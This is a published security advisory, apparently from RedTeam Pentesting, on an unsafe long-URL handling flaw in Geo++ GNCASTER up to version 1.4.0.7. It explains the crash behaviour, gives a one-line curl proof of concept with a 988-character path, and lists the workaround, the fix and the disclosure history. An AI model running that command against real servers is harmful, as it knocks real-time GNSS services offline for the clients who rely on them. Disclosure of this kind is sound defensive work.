Geo++(R) GNCASTER 1.4.0.7 Insecure Handling Of Long URLs

`Advisory: Geo++(R) GNCASTER: Insecure handling of long URLs  
  
During a penetration test, RedTeam Pentesting discovered that the  
GNCASTER software does not handle long URLs correctly. An attacker can  
use this to crash the server software or potentially execute code on the  
server.  
  
  
Details  
=======  
  
Product: Geo++(R) GNCASTER  
Affected Versions: <= 1.4.0.7  
Fixed Versions: 1.4.0.8  
Vulnerability Type: Memory corruption  
Security Risk: high  
Vendor URL: http://www.geopp.de  
Vendor Status: notified  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-001  
Advisory Status: published  
CVE: TBA  
CVE URL: TBA  
  
  
Introduction  
============  
  
"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP  
is a protocol within RTCM to provide GNSS information via Internet."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
The GNCaster software allows communication with clients through a subset  
of the HTTP protocol. If an attacker sends an HTTP GET request for a  
nonexistent URL path and the request is less than 988 bytes long, the  
server reacts with an HTTP 404 error and the message  
  
File "/AAAAAA[...]AAAA" not found on this server.  
  
If the URL path length is 988 bytes or more, the HTTP 404 error is still  
returned but the server thread stops before returning the message above.  
  
If attackers send a sequence of such requests in quick succession, the  
server can be reproducibly crashed. RedTeam Pentesting believes it is  
also possible to exploit this vulnerability to execute code on the  
server.  
  
  
Proof of Concept  
================  
  
The following command can be used to crash the server if it is called  
multiple times:  
  
$ curl -i "http://gncaster.example.com:1234/`perl -e 'printf "A"x988'`"  
  
  
  
Workaround  
==========  
  
A vulnerable server could be protected from this vulnerability by an  
application layer firewall that filters overly long HTTP GET requests.  
  
  
Fix  
===  
  
Update GNCASTER to version 1.4.0.8.  
  
  
Security Risk  
=============  
  
This vulnerability can be used for very efficient DoS attacks. This is  
especially serious as GNCaster is a real time application that is  
typically used by multiple mobile clients that rely on a functioning  
server. The vulnerability could potentially also be leveraged to remote  
code execution on the server. The risk is therefore regarded as high.  
  
  
History  
=======  
  
2009-07-06 Vulnerability identified during a penetration test  
2009-07-14 Meeting with customer  
2009-12-01 Vendor releases fixed version  
2010-01-27 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`